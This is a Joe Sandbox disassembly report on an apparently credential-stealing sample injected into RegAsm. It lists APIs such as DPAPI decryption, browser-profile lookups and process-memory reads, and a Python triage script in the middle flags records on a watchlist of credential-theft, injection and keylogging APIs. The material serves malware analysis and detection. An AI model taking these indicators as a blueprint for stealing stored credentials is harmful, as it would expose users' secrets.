                                                                                                                                  Similarity
                                                                                                                                  • API ID: ??2@FilePointermemcpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 609303285-0
                                                                                                                                  • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                  • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                                                  • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                  • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcsicmp
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2081463915-0
                                                                                                                                  • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                  • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                                  • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                  • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF), ref: 0040629C
                                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2136311172-0
                                                                                                                                  • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                  • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                  • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                  • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ??2@??3@
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1936579350-0
                                                                                                                                  • Opcode ID: c1d2223be94a68f833538aabce888aab0279aa93460cd9bacb51074fa57d6133
                                                                                                                                  • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                                                  • Opcode Fuzzy Hash: c1d2223be94a68f833538aabce888aab0279aa93460cd9bacb51074fa57d6133
                                                                                                                                  • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                  • Opcode ID: 003685cf356b02fbbab95fb8d76c74631070c0c773c27bafbcebbee0aa56b295
                                                                                                                                  • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                                  • Opcode Fuzzy Hash: 003685cf356b02fbbab95fb8d76c74631070c0c773c27bafbcebbee0aa56b295
                                                                                                                                  • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                  • Opcode ID: 196381b9ffc9c4816d42631a332da68c1e878a4277d624e181b366dd14fec77a
                                                                                                                                  • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                                  • Opcode Fuzzy Hash: 196381b9ffc9c4816d42631a332da68c1e878a4277d624e181b366dd14fec77a
                                                                                                                                  • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                  • Opcode ID: 6cd4ef4cc40bf5a7540e7e9c88dd58f61d837874a50d1d7f714cafdae955675f
                                                                                                                                  • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                                                                  • Opcode Fuzzy Hash: 6cd4ef4cc40bf5a7540e7e9c88dd58f61d837874a50d1d7f714cafdae955675f
                                                                                                                                  • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                  • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                                  • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                                  • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                                  • free.MSVCRT ref: 00418370
                                                                                                                                    • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                                                                                    • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                                  • String ID: OsError 0x%x (%u)
                                                                                                                                  • API String ID: 2360000266-2664311388
                                                                                                                                  • Opcode ID: 7a793c3aafbc7d353b0e578237d4b483da7e71834841705644cfc2f7eabd6d8e
                                                                                                                                  • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                                                  • Opcode Fuzzy Hash: 7a793c3aafbc7d353b0e578237d4b483da7e71834841705644cfc2f7eabd6d8e
                                                                                                                                  • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                                                  APIs
                                                                                                                                  • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                                  • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                                  • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                                  • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                                    • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                    • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                  • memset.MSVCRT ref: 0040265F
                                                                                                                                  • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                                                    • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                    • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                  • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                                                  • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcsicmp$Freememcpy$Library$CryptDataLocalUnprotectmemsetwcslen
                                                                                                                                  • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                  • API String ID: 2257402768-1134094380
                                                                                                                                  • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                                                                                  • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                                  • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                                                                                  • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
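The function records above (an "APIs" list with "Part of subcall function" entries, a "Memory Dump Source", and a "Similarity" block whose "String ID" field joins the referenced strings with "$") are the raw output of the Joe Sandbox IDA plugin. When triaging a report of this size, the record that matters first is the one that reaches CryptUnprotectData (DPAPI decryption, which is how browser credential stores are read), not the hundreds of allocator and dialog-layout stubs around it. The Python below is an added example, not code from the report or from Joe Sandbox: it parses this record layout into structured objects and flags records whose API set hits a watchlist. The sample input is a constructed excerpt in the same layout with placeholder Opcode IDs, and the watchlist and its descriptions are the editor's own choice.

```python
"""Parse Joe Sandbox IDA-plugin function records and flag the ones worth reading first."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

HEADINGS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# "Name.MODULE(args), ref: ADDR" or "Name.MODULE ref: ADDR", optionally prefixed by
# "Part of subcall function ADDR: ". Names may contain '?' and '@' (mangled MSVCRT operators).
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}): )?"
    r"(?P<name>[^.\s(]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]{8})$"
)
XREF_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<ref>[0-9A-Fa-f]{8})$")


@dataclass
class ApiRef:
    name: str
    module: str
    args: List[str]
    ref: int                      # address of the call site
    subcall: Optional[int]        # callee address when reached through a subcall, else None


@dataclass
class FunctionRecord:
    apis: List[ApiRef] = field(default_factory=list)
    strings: List[Tuple[str, int]] = field(default_factory=list)   # from the Strings section
    source_file: str = ""
    snapshot: str = ""
    similarity: dict = field(default_factory=dict)

    @property
    def opcode_id(self) -> str:
        return self.similarity.get("Opcode ID", "")

    @property
    def string_ids(self) -> List[str]:
        # '$' is the separator in the String ID field; a literal '$' string is ambiguous
        # in this format, so this split is best effort and drops empty pieces.
        return [s for s in self.similarity.get("String ID", "").split("$") if s]

    def api_names(self, include_subcalls: bool = True) -> set:
        return {a.name for a in self.apis if include_subcalls or a.subcall is None}


def parse_records(text: str) -> List[FunctionRecord]:
    """Split the plugin output into records; every record opens with its 'APIs' heading."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in HEADINGS:
            if line == "APIs":
                current = FunctionRecord()
                records.append(current)
            section = line
            continue
        if current is None:
            continue                                  # text before the first record
        body = line.lstrip("•").strip()
        if section == "APIs":
            m = API_RE.match(body)
            if m:
                args = [a for a in (m["args"] or "").split(",") if a]
                sub = int(m["sub"], 16) if m["sub"] else None
                current.apis.append(ApiRef(m["name"], m["module"], args, int(m["ref"], 16), sub))
        elif section == "Strings":
            m = XREF_RE.match(body)
            if m:
                current.strings.append((m["text"], int(m["ref"], 16)))
        elif section == "Memory Dump Source":
            key, _, value = body.partition(":")
            if key == "Source File":
                current.source_file = value.strip().split(",")[0]
        elif section == "Joe Sandbox IDA Plugin":
            key, _, value = body.partition(":")
            if key == "Snapshot File":
                current.snapshot = value.strip()
        elif section == "Similarity":
            key, _, value = body.partition(":")
            current.similarity[key.strip()] = value.strip()
    return records


# Watchlist chosen for this example (an assumption, not a Joe Sandbox list).
WATCHLIST = {
    "CryptUnprotectData": "DPAPI decryption (credential store access)",
    "ReadProcessMemory": "reads process memory (check whose handle is used)",
    "WriteProcessMemory": "writes into another process (injection)",
    "CreateRemoteThread": "remote thread creation (injection)",
    "SetWindowsHookExW": "global hook installation (keylogging)",
    "SetWindowsHookExA": "global hook installation (keylogging)",
}


def triage(records: List[FunctionRecord]) -> List[Tuple[str, List[str]]]:
    """Return (Opcode ID, reasons) for every record that touches a watchlisted API."""
    hits = []
    for rec in records:
        reasons = sorted(WATCHLIST[n] for n in rec.api_names() if n in WATCHLIST)
        if reasons:
            hits.append((rec.opcode_id, reasons))
    return hits


# Constructed excerpt in the report's record layout; Opcode IDs are placeholders.
SAMPLE = """\
APIs
• _wcsicmp.MSVCRT ref: 004022A6
  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
  • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?), ref: 00404498
• memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
• LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
Strings
Memory Dump Source
• Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: _wcsicmp$Freememcpy$Library$CryptDataLocalUnprotectmemsetwcslen
• String ID: Account$Data$Path$server
• Opcode ID: placeholder-opcode-id-1
APIs
• GetLastError.KERNEL32 ref: 004182D7
• FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
• free.MSVCRT ref: 00418370
Memory Dump Source
• Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
• String ID: OsError 0x%x (%u)
• Opcode ID: placeholder-opcode-id-2
APIs
Memory Dump Source
• Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: free
• String ID:
• Opcode ID: placeholder-opcode-id-3
"""

if __name__ == "__main__":
    for opcode_id, reasons in triage(parse_records(SAMPLE)):
        print(opcode_id, "->", "; ".join(reasons))
```

Run it against the report text saved as a file (replace `SAMPLE` with the file contents) and the triage list shrinks the thousands of records to the handful that decrypt DPAPI blobs, read or write other processes, or install hooks; the `string_ids` of a flagged record then show what it was looking for.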
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                                  • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                                  • GetDC.USER32 ref: 004140E3
                                                                                                                                  • wcslen.MSVCRT ref: 00414123
                                                                                                                                  • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                                  • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                                  • _snwprintf.MSVCRT ref: 00414244
                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                                  • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                  • String ID: %s:$EDIT$STATIC
                                                                                                                                  • API String ID: 2080319088-3046471546
                                                                                                                                  • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                  • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                                  • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                  • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                                  APIs
                                                                                                                                  • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                                  • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                                  • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                                  • memset.MSVCRT ref: 00413292
                                                                                                                                  • memset.MSVCRT ref: 004132B4
                                                                                                                                  • memset.MSVCRT ref: 004132CD
                                                                                                                                  • memset.MSVCRT ref: 004132E1
                                                                                                                                  • memset.MSVCRT ref: 004132FB
                                                                                                                                  • memset.MSVCRT ref: 00413310
                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                                  • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                                  • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                                  • memset.MSVCRT ref: 004133C0
                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                                  • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                                                  • wcscpy.MSVCRT ref: 0041341F
                                                                                                                                  • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                                  • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                                  • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                                  Strings
                                                                                                                                  • {Unknown}, xrefs: 004132A6
                                                                                                                                  • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                  • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                  • API String ID: 4111938811-1819279800
                                                                                                                                  • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                  • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                                                  • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                  • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                                  • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                                  • SetCursor.USER32(00000000), ref: 0040129E
                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                                  • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                                  • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                                  • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                                  • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                                  • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                                  • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                                  • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                                  • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                                  • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 829165378-0
                                                                                                                                  • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                  • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                                  • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                  • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                                  APIs
                                                                                                                                  • memset.MSVCRT ref: 00404172
                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                  • wcscpy.MSVCRT ref: 004041D6
                                                                                                                                  • wcscpy.MSVCRT ref: 004041E7
                                                                                                                                  • memset.MSVCRT ref: 00404200
                                                                                                                                  • memset.MSVCRT ref: 00404215
                                                                                                                                  • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                  • wcscpy.MSVCRT ref: 00404242
                                                                                                                                  • memset.MSVCRT ref: 0040426E
                                                                                                                                  • memset.MSVCRT ref: 004042CD
                                                                                                                                  • memset.MSVCRT ref: 004042E2
                                                                                                                                  • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                                  • wcscpy.MSVCRT ref: 00404311
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                  • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                                  • API String ID: 2454223109-1580313836
                                                                                                                                  • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                  • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                                  • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                  • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                                  • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                                  • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
